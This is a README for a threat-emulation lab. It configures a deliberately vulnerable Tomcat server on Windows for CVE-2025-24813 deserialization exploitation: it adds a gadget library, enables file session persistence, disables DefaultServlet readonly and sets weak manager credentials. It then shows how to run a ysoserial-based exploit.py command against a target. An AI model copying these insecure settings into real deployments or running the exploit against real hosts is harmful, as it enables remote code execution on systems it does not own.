This repo aims to provide clear instructions for rapid deployment of Tomcat v9.0.90 with java 25.0.1 2025-10-21 LTS on Windows Server 2019 Standard for Cyber Security threat emulation exercise. The exploit.py leverages on ysoserial-all.jar to create a payload using CommonsCollections6 module in ysoserial-all.jar, which is later deserialised by the commons-collections-3.2.1.jar dependency in %CATALINA_HOME%\webapps\ROOT\WEB-INF\lib.
- Download
Tomcat v9.0.90:
Invoke-WebRequest -Uri "https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.90/bin/apache-tomcat-9.0.90-windows-x64.zip" -OutFile "apache-tomcat-9.0.90-windows-x64.zip"
Expand-Archive -Path "apache-tomcat-9.0.90-windows-x64.zip" -DestinationPath "C:\"- Download
java 25.0.1 2025-10-21 LTS(ZIP version):
Invoke-WebRequest -Uri "https://download.oracle.com/java/25/archive/jdk-25_windows-x64_bin.zip" -OutFile "jdk-25_windows-x64_bin.zip"
Expand-Archive -Path "jdk-25_windows-x64_bin.zip" -DestinationPath "C:\"- Download commons-collections dependency:
mkdir C:\apache-tomcat-9.0.90\webapps\ROOT\WEB-INF\lib\
cd C:\apache-tomcat-9.0.90\webapps\ROOT\WEB-INF\lib\
Invoke-WebRequest -Uri "https://repo1.maven.org/maven2/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar" -OutFile "commons-collections-3.2.1.jar"- Setting up the Environment Variables
1. Click on Start
2. Type "edit the system environment variables"
3. Create two new System Variables named
- `%JAVA_HOME%` with value `C:\jdk-25.0.1`
- `%CATALINA_HOME%` with value `C:\apache-tomcat-9.0.90`
4. Edit the System Variable named `Path`, and add the following values:
- `%JAVA_HOME%\bin`
- `%CATALINA_HOME%\bin`
- Creating a service for auto startup
C:\apache-tomcat-9.0.90\bin\service.bat install Tomcat9Server
Set-Service -Name "Tomcat9Server" -StartupType Automatic
Start-Service -Name "Tomcat9Server"- Open
tomcat-users.xmlin thetomcat-9.0.90\conffolder and add the following BEFORE</tomcat-users>:
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
- Open
context.xmlin thetomcat-9.0.90\conffolder and replace ALL content with the following:
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<!-- The contents of this file will be loaded for each web application -->
<Context>
<Manager className="org.apache.catalina.session.PersistentManager" maxIdleBackup="1" saveOnRestart="true" processExpiresFrequency="1">
<Store className="org.apache.catalina.session.FileStore"/>
</Manager>
</Context>
- Open
web.xmlin thetomcat-9.0.90\conffolder, search for DefaultServlet and replace the entire<servlet></servlet>with the following:
<servlet>
<servlet-name>default</servlet-name>
<servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
<init-param>
<param-name>debug</param-name>
<param-value>0</param-value>
</init-param>
<init-param>
<param-name>listings</param-name>
<param-value>false</param-value>
</init-param>
<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
- Restart your server with powershell
shutdown.bat
startup.bat
- If you can't connect to the web server externally, it may be blocked by Windows Firewall. Configure your firewall to allow connection.
New-NetFirewallRule -DisplayName "Tomcat9Server" -Direction Inbound -Protocol TCP -LocalPort 8080 -Action Allow- Congrats! You just enabled a vulnerable Tomcat server with Java deserialization capabilities through commons-collections-3.2.1.jar, session persistence via FileStore, and disabled readonly protection in DefaultServlet (web.xml), making it susceptible to CVE-2025-24813 exploitation via ysoserial payloads. Throw in some legit looking
index.htmlinC:\tomcat-9.0.90\webapps\ROOTto make it look fancier.
- Open C:\apache-tomcat-9.0.90\conf\web.xml with notepad, and search for "<Connector port=". You may uncomment the block and add in your own .pfx path. Below is an example of adding in a cert.pfx in a newly created ssl folder with no password running HTTP/1.1:
<Connector port="443"
protocol="org.apache.coyote.http11.Http11NioProtocol"
maxThreads="150"
SSLEnabled="true"
scheme="https"
secure="true">
<SSLHostConfig>
<Certificate certificateKeystoreFile="C:\tomcat-9.0.90\conf\ssl\cert.pfx"
certificateKeystorePassword=""
certificateKeystoreType="PKCS12" />
</SSLHostConfig>
</Connector>
- Add in firewall rule if required:
New-NetFirewallRule -DisplayName "Tomcat9HTTPSServer" -Direction Inbound -Protocol TCP -LocalPort 443 -Action Allow- Cloning
exploit.py
git clone <this-repo-url>
cd CVE-2025-24813
pip install requests
- Checking if you have java, and downloading ysoserial from Github
java --version
curl -L -o ysoserial-all.jar https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar
- Usage examples:
python exploit.py -t http://<target IP>:8080/ -c "cmd.exe /c calc.exe"
- On each execution of
exploit.py, two session files would be created inC:\tomcat-9.0.90\webapps\ROOTandC:\tomcat-9.0.90\work\Catalina\localhost\ROOTwith a randomised name. The.sessionwithin the work folder should be deleted a few seconds after execution.
